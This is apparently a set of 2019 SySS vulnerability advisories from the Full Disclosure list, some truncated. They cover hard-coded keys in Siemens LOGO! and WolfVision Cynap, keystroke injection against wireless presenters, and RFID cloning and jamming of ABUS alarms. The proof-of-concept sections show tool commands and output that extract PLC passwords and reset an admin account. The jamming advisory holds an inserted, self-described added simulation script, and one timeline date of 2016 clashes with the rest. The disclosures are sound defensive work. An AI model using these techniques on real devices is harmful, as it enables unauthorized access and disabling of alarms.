By knowing this static cryptographic 3DES key, an attacker can decrypt
all LOGO! data that is encrypted with this key and gain access to
sensitive data, for instance different configured passwords.



Proof of Concept (PoC):

SySS GmbH used the hard-coded cryptographic 3DES key in a software tool
(Nmap script) for extracting sensitive data such as configured passwords
as cleartext.

The following Nmap output exemplarily shows extracting password data
from a LOGO! 8 PLC:

$ nmap -p 10005 --script slig.nse 192.168.10.112
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-04 09:35 CEST
Nmap scan report for 192.168.10.112
Host is up (0.00044s latency).

PORT  STATE SERVICE
10005/tcp open  stel
| slig: Gathered Siemens LOGO!8 access details and passwords
| User: LSCUser
| Password: S3cret1
| Enabled: True
| User: AppUser
| Password: S3cret2
| Enabled: True
| User: WebUser
| Password: S3cret3
| Enabled: True
| User: TDUser
| Password: S3cret4
| Enabled: True
| Protection: Password
| Program password: SECRET
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

A successful attack against a LOGO! 8 extracting all configured
passwords is demonstrated in our SySS PoC video [5].



Solution:

In the publicly released Siemens Security Advisory SSA-542701 [3],
the manufacturer Siemens recommends applying a defense-in-depth concept,
including the protection concept outlined in the system manual, as a
mitigation for reducing the risk of the described security issue.



Disclosure Timeline:

2019-04-04: Vulnerability reported to manufacturer
2019-04-04: Manufacturer confirms receipt of security advisory and
asks for referenced Nmap script
2019-04-04: SySS provides PoC Nmap script
2019-05-14: Public release of Siemens Security Advisory SSA-542701
2019-05-29: Public release of SySS security advisory



References:

[1] Product website for Siemens LOGO!

https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html
[2] SySS Security Advisory SYSS-2019-012

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt
[3] Siemens Security Advisory SSA-542701
https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[5] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"
https://youtu.be/TpH4EABGYCs



Credits:

This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D



Disclaimer:

The information provided in this security advisory is provided "as is"
and without

[FD] [SYSS-2019-007]: Inateck 2.4 GHz Wireless Presenter WP1001 - Keystroke Injection Vulnerability

2019-06-11 Thread Matthias Deeg
Advisory ID: SYSS-2019-007
Product: 2.4 GHz Wireless Presenter WP1001
Manufacturer: Inateck
Affected Version(s): Rev. v1.3C
Tested Version(s): Rev. v1.3C
Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345)
Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-03-22
Solution Date: -
Public Disclosure: 2019-06-04
CVE Reference: CVE-2019-12505
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Inateck WP1001 is a wireless presenter using 2.4 GHz radio
communication.

The manufacturer describes the product as follows:

"* 2.4GHz Wireless Connection allows you to move around while
   giving presentations
 * Fingertip Controls make it easy for you to adjust the volume, change
   slides and more
 * Red Laser Pointer works up to 65 feet (20m) away
 * LCD Screen with timer vibration and low-battery indicator
 * Includes Carrying Case to help protect your device on the go
"

Due to unencrypted and unauthenticated data communication, the wireless
presenter Inateck WP1001 is prone to keystroke injection attacks.



Vulnerability Details:

SySS GmbH found out that the wireless presenter Inateck WP1001 is
vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data
packets of the 2.4 GHz radio communication sent by the wireless
presenter to the receiver (USB dongle) in order to learn the used
protocol. By knowing the used data protocol, it is possible to inject
packets in the data communication that are actually interpreted as
keystrokes by the receiver on the target system.

Thus, an attacker is able to send arbitrary keystrokes to a victim's
computer system, for example in order to install malware when the target
system is unattended. In this way, an attacker can remotely take control
over the victim's computer that is operated with an affected receiver of
an Inateck WP1001 wireless presenter.



Proof of Concept (PoC):

SySS GmbH could successfully perform keystroke injection attacks against
the wireless presenter Inateck WP1001 using the open-source software
tool Universal Radio Hacker [2] in combination with the software-defined
radio HackRF One [3].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-03-22: Vulnerability reported to manufacturer
2019-06-04: Public release of security advisory



References:

[1] Manufacturer website
https://www.inateck.com/
[2] Universal Radio Hacker (URH)
https://github.com/jopohl/urh
[3] HackRF One by Great Scott Gadgets
https://greatscottgadgets.com/hackrf/
[4] SySS Security Advisory SYSS-2019-007

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-007.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en



signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [SYSS-2019-015]: Logitech R700 Laser Presentation Remote - Keystroke Injection Vulnerability

2019-06-11 Thread Matthias Deeg
Advisory ID: SYSS-2019-015
Product: R700 Laser Presentation Remote
Manufacturer: Logitech
Affected Version(s): Model R-R0010 (PID WD904XM and PID WD802XM)
Tested Version(s): Model R-R0010 (PID WD904XM and PID WD802XM)
Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345)
Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-04-12
Solution Date: -
Public Disclosure: 2019-06-04
CVE Reference: CVE-2019-12506
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Logitech R700 Laser Presentation Remote is a wireless presenter using
2.4 GHz radio communication.

The manufacturer describes the product as follows [1]:

"Brilliant red laser pointer helps you get their attention - and keep
it."

Due to unencrypted and unauthenticated data communication, the wireless
presenter Logitech R700 Laser Presentation Remote is prone to keystroke
injection attacks.



Vulnerability Details:

SySS GmbH found out that the wireless presenter Logitech R700 Laser
Presentation Remote is vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data packets
of the 2.4 GHz radio communication sent by the wireless presenter to the
receiver (USB dongle) in order to learn the used protocol. By knowing
the used data protocol, it is possible to inject packets in the data
communication that are actually interpreted as keystrokes by the
receiver on the target system.

Thus, an attacker is able to send arbitrary keystrokes to a victim's
computer system, for example in order to install malware when the target
system is unattended. In this way, an attacker can remotely take control
over the victim's computer that is operated with an affected receiver of
a Logitech R700 wireless presenter.



Proof of Concept (PoC):

SySS GmbH could successfully perform keystroke injection attacks against
the wireless presenter Logitech R700 Laser Presentation Remote using an
in-house developed software tool in combination with the USB radio
dongle Crazyradio PA and the nrf-research-firmware by Bastille Networks
Internet Security [2, 3].

The following output of the developed proof-of-concept software tool
illustrates a successful attack:

# python2 logitech_presenter.py -a 7F:20:9E:C2:07
Logitech Wireless Presenter Attack Tool v1.0 by Matthias Deeg - SySS
GmbH (c) 2016
[*] Configure nRF24 radio
[*] Actively searching for address 07:C2:9E:20:7F
[*] Ping success on channel 8
[*] Ping success on channel 8
[*] Press  to start keystroke injection
^C
[*] Start keystroke injection ...
[*] Done.

This demonstrated keystroke injection attack also worked in 2016 against
the wireless presenter Logitech R400, which is described in the SySS
security advisory SYSS-2016-074 [4].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-04-12: Vulnerability reported to manufacturer
2019-06-04: Public release of security advisory



References:

[1] Product website for Logitech R700
https://www.logitech.com/en-roeu/product/professional-presenter-r700
[2] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[3] Bastille's nRF24 research firmware and tools
https://github.com/BastilleResearch/nrf-research-firmware
[4] SySS Security Advisory SYSS-2016-074

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-074.txt
[5] SySS Security Advisory SYSS-2019-015

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-015.txt
[6] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4

[FD] [SYSS-2019-008]: Inateck 2.4 GHz Wearable Wireless Presenter WP2002 - Keystroke Injection Vulnerability

2019-06-11 Thread Matthias Deeg
Advisory ID: SYSS-2019-008
Product: 2.4 GHz Wearable Wireless Presenter WP2002
Manufacturer: Inateck
Affected Version(s): n/a
Tested Version(s): n/a
Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345)
Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-03-22
Solution Date: -
Public Disclosure: 2019-06-04
CVE Reference: CVE-2019-12504
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Inateck WP2002 is a ring-shaped wearable wireless presenter using
2.4 GHz radio communication.

The manufacturer describes the product as follows:

"
* Easy to Use: Uses 2.4 GHz USB wireless connection, with receiving
  distance reaching 20 meters. You’re free to move in a large space
  when wearing it on fingers. No driver needed, just plug and play!
* Ring-shaped design. You can wear it on your fingers (the ring is
  adjustable). Free your hands and have more body language, which will
  let your speech become more attractive.
* Multi-functional: By controlling the three function keys in control
  key area, you can turn pages, open full screen, close the screen, and
  access a hyperlink.
* Prolonged working use. Full charge allows a continuous working time
  of 15 days. Battery life is powerful, which greatly facilitates
  frequent use.
* Fits Powerpoint, Keynote (except hyperlink and windows switch
  functions), and supports page turning function with Google Slides and
  Prezi. Compatible with Windows XP/7/8/8.1/10, Mac OS, Linux, Android
  and etc.
"

Due to unencrypted and unauthenticated data communication, the wireless
presenter Inateck WP2002 is prone to keystroke injection attacks.



Vulnerability Details:

SySS GmbH found out that the wireless presenter Inateck WP2002 is
vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data
packets of the 2.4 GHz radio communication sent by the wireless
presenter to the receiver (USB dongle) in order to learn the used
protocol. By knowing the used data protocol, it is possible to inject
packets in the data communication that are actually interpreted as
keystrokes by the receiver on the target system.

Thus, an attacker is able to send arbitrary keystrokes to a victim's
computer system, for example in order to install malware when the target
system is unattended. In this way, an attacker can remotely take control
over the victim's computer that is operated with an affected receiver of
an Inateck WP2002 wireless presenter.



Proof of Concept (PoC):

SySS GmbH could successfully perform keystroke injection attacks against
the wireless presenter Inateck WP2002 using the open-source software
tool Universal Radio Hacker [2] in combination with the software-defined
radio HackRF One [3].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-03-22: Vulnerability reported to manufacturer
2019-06-04: Public release of security advisory



References:

[1] Product website for Inateck WP2002

https://www.inateck.com/de/kabellos-praesentationsgeraet-laiserpointer-presenter-fernbedienung-powerpoint-keynote-usb-adapter-plug-and-play-schwarz-wp2002.html
[2] Universal Radio Hacker (URH)
https://github.com/jopohl/urh
[3] HackRF One by Great Scott Gadgets
https://greatscottgadgets.com/hackrf/
[4] SySS Security Advisory SYSS-2019-008

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-008.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en




[FD] [SYSS-2019-005]: ABUS Secvest - Proximity Key - Cryptographic Issues (CWE-310)

2019-05-04 Thread Matthias Deeg
Advisory ID: SYSS-2019-005
Product: ABUS Secvest (FUAA5)
Manufacturer: ABUS
Affected Version(s): v3.01.01
Tested Version(s): v3.01.01
Vulnerability Type: Cryptographic Issues (CWE-310)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-03-15
Solution Date: -
Public Disclosure: 2019-05-02
CVE Reference: CVE-2019-9861
Authors of Advisory: Matthias Deeg, Gerhard Klostermeier (SySS GmbH)



Overview:

ABUS Secvest (FUAA5) is a wireless alarm system with different
features.

Some of the supported features as described by the manufacturer are
(see [1]):

"
* Convenient operation via the app (Android/iOS), integrated web
  browser and also at the alarm panel
* For up to 50 users with freely selectable control options
  (code/chip key/remote control)
* Active intrusion protection in combination with additional mechatronic
  wireless window/door locks
* Video verification of alarms via email, push notifications or via the
  app
* Up to 48 individually identifiable wireless detectors, eight control
  panels, 50 remote controls
* Integrated dialling device
* VdS Home certified and EN 50131-1 Level 2
* Alarm verification via the integration of up to six IP cameras
* 32 additional wireless outputs for flexible event control
* Switching to monitoring station via protocols possible
"

Due to the use of an insecure RFID technology (MIFARE Classic), ABUS
proximity chip keys (RFID tokens) [2] of the ABUS Secvest wireless alarm
system can easily be cloned and used to deactivate the alarm system in
an unauthorized way.



Vulnerability Details:

SySS GmbH found out that the RFID technology used by the ABUS Secvest
wireless alarm system and its ABUS proximity keys (MIFARE Classic RFID
tags) is vulnerable to RFID cloning attacks.

The information stored on the used proximity keys can be read easily in
a very short time from distances up to 1 meter, depending on the used
RFID reader. A working cloned RFID token is ready for use within a
couple of seconds using freely available tools.

Thus, an attacker with one-time access to the information of an ABUS
proximity key for an ABUS Secvest wireless alarm system is able to
create a rogue RFID token that can be used to deactivate the alarm
system in an unauthorized manner.



Proof of Concept (PoC):

SySS GmbH could successfully clone ABUS proximity keys of an ABUS
Secvest wireless alarm system using different freely available
off-the-shelf tools like an Android smartphone with the Mifare Classic
Tool (MCT) [3], a ChameleonMini [4], and an RFID/NFC reader/writer [5]
and disarm the wireless alarm system in an unauthorized way.

All three RFID cloning attacks are demonstrated in our SySS
proof-of-concept video "ABUS Secvest Proximity Key Cloning PoC Attack"
[6].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-03-15: Vulnerability reported to manufacturer
2016-05-02: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless alarm system
https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System

[2] Product website for ABUS proximity chip key
https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Proximity-Chip-Key

[3] MIFARE Classic Tool - MCT
https://play.google.com/store/apps/details?id=de.syss.MifareClassicTool

[4] GitHub repository of ChameleonMini
https://github.com/emsec/ChameleonMini

[5] OBO Hands RFID/NFC Reader/Writer
https://www.amazon.de/dp/B07DHL9XQ4/

[6] SySS Proof-of-Concept Video: ABUS Secvest Proximity Key Cloning PoC
Attack
https://youtu.be/sPyXTQXTEcQ

[7] SySS Security Advisory SYSS-2019-005
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-005.txt

[8] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg and Gerhard
Klostermeier of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30

[FD] [SYSS-2019-021]: WolfVision Cynap - Use of Hard-coded Cryptographic Key (CWE-321)

2019-07-05 Thread Matthias Deeg
Advisory ID: SYSS-2019-021
Product: Cynap
Manufacturer: WolfVision
Affected Version(s): 1.18g, 1.28j
Tested Version(s): 1.18g, 1.28j
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2019-05-03
Solution Date: 2019-06-19
Public Disclosure: 2019-07-04
CVE Reference: Not assigned yet
Authors of Advisory: Manuel Stotz, Gerhard Klostermeier (SySS GmbH)



Overview:

WolfVision Cynap is a wireless collaboration and presentation system.

The manufacturer describes the product as follows [1]:

"Cynap is a stand-alone all-in-one wireless collaboration and
presentation system which includes a built-in media player, web
conferencing, on-board recording and streaming, BYOD screen sharing
for all mobile devices, and annotation functionality, making it the
ideal device to form the centrepiece of new and adapted classrooms and
meeting spaces."

Due to the use of a hard-coded cryptographic key, an attacker can
generate support PINs for resetting the administrative user password in
order to gain administrative access to the device.



Vulnerability Details:

SySS GmbH found out that the WolfVision Cynap wireless collaboration
and presentation system uses a static, hard-coded cryptographic secret
for generating support PINs used for the provided 'forgot password'
functionality.

By knowing this static secret and the corresponding algorithm for
calculating support PINs, an attacker can reset the password of the
administrative user account "ADMIN" and thus gain unauthorized access to
the affected Cynap device via a network connection.



Proof of Concept (PoC):

SySS GmbH developed a software tool for generating support PINs either
in online or offline mode.

The following output of the software tool illustrates a successful
attack resulting in a reset password for the administrative user
account "ADMIN".

$ python ./wolfvision_cynap_keygen.py --online 192.168.40.109
WolfVision vSolution Cynap Keygen
   by
  Manuel Stotz
  Gerhard Klostermeier

[*] Launch keygen in online mode ... [OK]
[*] Gathering data ... [OK]
[*] Serialnumber: 
[*] Support PIN: 447301
[*] Generating new Support PIN ... [OK]
[+] New Support PIN: 723247
[*] Account: ADMIN
[*] Password: Password
[*] Bye!

A successful attack against a vulnerable WolfVision Cynap device gaining
administrative access is demonstrated in our SySS PoC video
"Administrating WolfVision Cynap the Hacker's Way" [5].



Solution:

Install the firmware version 1.30j provided by the manufacturer
WolfVision [2].



Disclosure Timeline:

2019-05-03: Vulnerability reported to manufacturer
2019-05-10: Vulnerability reported to manufacturer again
2019-05-13: Manufacturer confirms receipt of security advisory
2019-05-31: Manufacturer schedules firmware update 1.30j with fix for
the reported security issue
2019-06-19: Release of firmware update 1.30j including security fix
2019-07-04: Public release of SySS security advisory



References:

[1] Product website for WolfVision Cynap
https://www.wolfvision.com/vsolution/index.php/en/presentation-systems/cynap/cynap
[2] WolfVision firmware downloads
https://wolfvision.com/vsolution/index.php/de/support/downloads
[3] SySS Security Advisory SYSS-2019-021
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-021.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[5] SySS Proof-of-Concept Video "Administrating WolfVision Cynap the
Hacker's Way"
https://youtu.be/veEtiYAWvMY



Credits:

This security vulnerability was found by Manuel Stotz and Gerhard
Klostermeier of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to 

[FD] [SYSS-2019-004]: ABUS Secvest (FUAA50000) - Message Transmission - Unchecked Error Condition (CWE-391) (CVE-2019-14261)

2019-07-26 Thread Matthias Deeg
Advisory ID: SYSS-2019-004
Product: ABUS Secvest (FUAA5)
Manufacturer: ABUS
Affected Version(s): v3.01.01
Tested Version(s): v3.01.01
Vulnerability Type: Message Transmission - Unchecked Error Condition
(CWE-391)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-03-02
Solution Date: -
Public Disclosure: 2019-07-26
CVE Reference: CVE-2019-14261
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert



Overview:

ABUS Secvest (FUAA5) is a wireless alarm system with different
features.

Some of the supported features as described by the manufacturer are
(see [1]):

"
* Convenient operation via the app (Android/iOS), integrated web
  browser and also at the alarm panel
* For up to 50 users with freely selectable control options
  (code/chip key/remote control)
* Active intrusion protection in combination with additional mechatronic
  wireless window/door locks
* Video verification of alarms via email, push notifications or via the
  app
* Up to 48 individually identifiable wireless detectors, eight control
  panels, 50 remote controls
* Integrated dialling device
* VdS Home certified and EN 50131-1 Level 2
* Alarm verification via the integration of up to six IP cameras
* 32 additional wireless outputs for flexible event control
* Switching to monitoring station via protocols possible
"

Due to an insufficient implementation of the jamming detection, an
attacker is able to suppress correctly received RF messages sent between
wireless peripheral components, for example wireless detectors or remote
controls, and the ABUS Secvest alarm central.



Vulnerability Details:

Thomas Detert found out that the jamming detection of the ABUS alarm
central does not detect short jamming signals that are shorter than
normal ABUS RF messages.

Thus, an attacker is able to perform a "reactive jamming" attack. The
reactive jamming simply detects the start of a RF message sent by a
component of the ABUS Secvest wireless alarm system, for instance a
wireless motion detector (FUBW5) or a remote control (FUBE50014 or
FUBE50015), and overlays it with random data before the original RF
message ends. Thereby, the receiver (alarm central) is not able to
properly decode the original transmitted signal.

This enables an attacker to suppress correctly received RF messages of
the wireless alarm system in an unauthorized manner, for instance status
messages sent by a detector indicating an intrusion.
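To make the detection gap concrete, the following constructed timing model is added here as an example; it is not part of the advisory and not Mr. Detert's tool. It assumes fixed-length frames of MSG_MS milliseconds, a panel detector that only alarms on interference lasting at least one frame, and a receiver that can tell "preamble locked, CRC failed" from silence; it shows why bursts shorter than a frame slip past the duration check and how counting integrity failures catches them.

```python
"""Constructed timing model of the jamming-detection gap described above.

Added example, not code from SySS, Thomas Detert or ABUS. Everything below
is an assumption of the model: frames last MSG_MS milliseconds, the panel's
detector only alarms on interference lasting at least one frame, and the
receiver can distinguish a locked preamble with a failed CRC from silence.
"""
from dataclasses import dataclass
from typing import Dict, List

MSG_MS = 20.0            # assumed nominal RF frame duration (constructed)
JAM_ALARM_MS = MSG_MS    # weak threshold: only interference >= one frame counts
PREAMBLE_MS = 2.0        # assumed time until the receiver has locked onto a frame


@dataclass(frozen=True)
class Frame:
    device: str
    start_ms: float

    @property
    def end_ms(self) -> float:
        return self.start_ms + MSG_MS


@dataclass(frozen=True)
class Interference:
    start_ms: float
    end_ms: float

    @property
    def duration_ms(self) -> float:
        return self.end_ms - self.start_ms

    def overlaps(self, frame: Frame) -> bool:
        return self.start_ms < frame.end_ms and self.end_ms > frame.start_ms


def reactive_burst(frame: Frame, react_ms: float, burst_ms: float) -> Interference:
    """Model a reactive jammer: it notices the frame react_ms after it starts
    and overlays it for burst_ms; the burst never outlives the frame."""
    start = frame.start_ms + react_ms
    return Interference(start, min(start + burst_ms, frame.end_ms))


def duration_detector(interference: List[Interference]) -> bool:
    """Weak check: alarm only when one interference burst lasts a whole frame."""
    return any(i.duration_ms >= JAM_ALARM_MS for i in interference)


def frame_outcome(frame: Frame, interference: List[Interference]) -> str:
    """What the receiver sees for one frame: 'ok', 'crc_fail' (preamble was
    locked before the burst hit) or 'lost' (burst arrived before lock)."""
    hits = [i for i in interference if i.overlaps(frame)]
    if not hits:
        return "ok"
    first_hit = min(i.start_ms for i in hits)
    return "crc_fail" if first_hit >= frame.start_ms + PREAMBLE_MS else "lost"


def integrity_detector(frames: List[Frame], interference: List[Interference],
                       max_crc_fail: int = 2) -> bool:
    """Stronger check: consecutive 'preamble seen, CRC failed' frames are
    treated as jamming even if every burst is shorter than a frame."""
    streak = 0
    for f in frames:
        if frame_outcome(f, interference) == "crc_fail":
            streak += 1
            if streak >= max_crc_fail:
                return True
        else:
            streak = 0
    return False


def simulate(n_frames: int, react_ms: float, burst_ms: float) -> Dict[str, object]:
    """Send n_frames status messages 100 ms apart, jam each one reactively
    (burst_ms == 0 means no jammer) and report what each detector concludes."""
    frames = [Frame("FUMK5W", 100.0 * k) for k in range(n_frames)]
    bursts = [reactive_burst(f, react_ms, burst_ms) for f in frames] if burst_ms > 0 else []
    return {
        "frames_suppressed": sum(frame_outcome(f, bursts) != "ok" for f in frames),
        "duration_detector_alarm": duration_detector(bursts),
        "integrity_detector_alarm": integrity_detector(frames, bursts),
    }


if __name__ == "__main__":
    # A 10 ms burst starting 3 ms into each 20 ms frame: every frame is
    # suppressed, yet the duration-based detector never alarms.
    print(simulate(n_frames=5, react_ms=3.0, burst_ms=10.0))
    print(simulate(n_frames=5, react_ms=0.0, burst_ms=0.0))   # no jamming
```

A crude continuous jammer (burst longer than a frame) does trip the duration check, which is exactly why a threshold tied to message length gives a false sense of coverage.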



Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows suppressing arming the alarm system in an
unauthorized way. He provided his tool including documentation and
source to SySS GmbH for responsible disclosure purposes.

SySS GmbH could successfully perform the described reactive jamming attack
against an ABUS Secvest wireless alarm system. RF messages sent by the
configured ABUS Secvest components FUBE50015 (remote control), FUBW5
(motion detector), and FUMK5W (magnetic contact detector) were
successfully suppressed and no alarm was triggered.



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-03-02: Vulnerability reported to manufacturer
2019-07-26: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless alarm system
https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System
[2] SySS Security Advisory SYSS-2019-004
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-004.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Thomas Detert.

Mr. Detert reported his finding to SySS GmbH where it was verified and
later reported to the manufacturer by Matthias Deeg.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this 

[FD] UPDATE: [SYSS-2019-021]: WolfVision Cynap - Use of Hard-coded Cryptographic Key (CWE-321) [CVE-2019-13352]

2019-07-09 Thread Matthias Deeg
Advisory ID: SYSS-2019-021
Product: Cynap
Manufacturer: WolfVision
Affected Version(s): 1.18g, 1.28j
Tested Version(s): 1.18g, 1.28j
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2019-05-03
Solution Date: 2019-06-19
Public Disclosure: 2019-07-04
CVE Reference: CVE-2019-13352
Authors of Advisory: Manuel Stotz, Gerhard Klostermeier (SySS GmbH)



Overview:

WolfVision Cynap is a wireless collaboration and presentation system.

The manufacturer describes the product as follows [1]:

"Cynap is a stand-alone all-in-one wireless collaboration and
presentation system which includes a built-in media player, web
conferencing, on-board recording and streaming, BYOD screen sharing
for all mobile devices, and annotation functionality, making it the
ideal device to form the centrepiece of new and adapted classrooms and
meeting spaces."

Due to the use of a hard-coded cryptographic key, an attacker can
generate support PINs for resetting the administrative user password in
order to gain administrative access to the device.



Vulnerability Details:

SySS GmbH found out that the WolfVision Cynap wireless collaboration
and presentation system uses a static, hard-coded cryptographic secret
for generating support PINs used for the provided 'forgot password'
functionality.

By knowing this static secret and the corresponding algorithm for
calculating support PINs, an attacker can reset the password of the
administrative user account "ADMIN" and thus gain unauthorized access to
the affected Cynap device via a network connection.



Proof of Concept (PoC):

SySS GmbH developed a software tool for generating support PINs either
in online or offline mode.

The following output of the software tool illustrates a successful
attack resulting in a reset password for the administrative user
account "ADMIN".

$ python ./wolfvision_cynap_keygen.py --online 192.168.40.109
WolfVision vSolution Cynap Keygen
   by
  Manuel Stotz
  Gerhard Klostermeier

[*] Launch keygen in online mode ... [OK]
[*] Gathering data ... [OK]
[*] Serialnumber: 
[*] Support PIN: 447301
[*] Generating new Support PIN ... [OK]
[+] New Support PIN: 723247
[*] Account: ADMIN
[*] Password: Password
[*] Bye!

A successful attack against a vulnerable WolfVision Cynap device gaining
administrative access is demonstrated in our SySS PoC video
"Administrating WolfVision Cynap the Hacker's Way" [5].



Solution:

Install the firmware version 1.30j provided by the manufacturer
WolfVision [2].



Disclosure Timeline:

2019-05-03: Vulnerability reported to manufacturer
2019-05-10: Vulnerability reported to manufacturer again
2019-05-13: Manufacturer confirms receipt of security advisory
2019-05-31: Manufacturer schedules firmware update 1.30j with fix for
the reported security issue
2019-06-19: Release of firmware update 1.30j including security fix
2019-07-04: Public release of SySS security advisory
2019-07-08: Release of updated security advisory with assigned CVE ID



References:

[1] Product website for WolfVision Cynap
